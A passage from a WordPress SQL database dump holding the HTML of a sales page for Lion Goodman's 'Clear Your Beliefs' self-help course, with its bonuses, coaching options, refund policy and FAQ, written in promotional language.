width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:46:00', '2014-06-17 21:46:00', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(943, 4194, '2014-06-17 16:43:02', '2014-06-17 21:43:02', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img 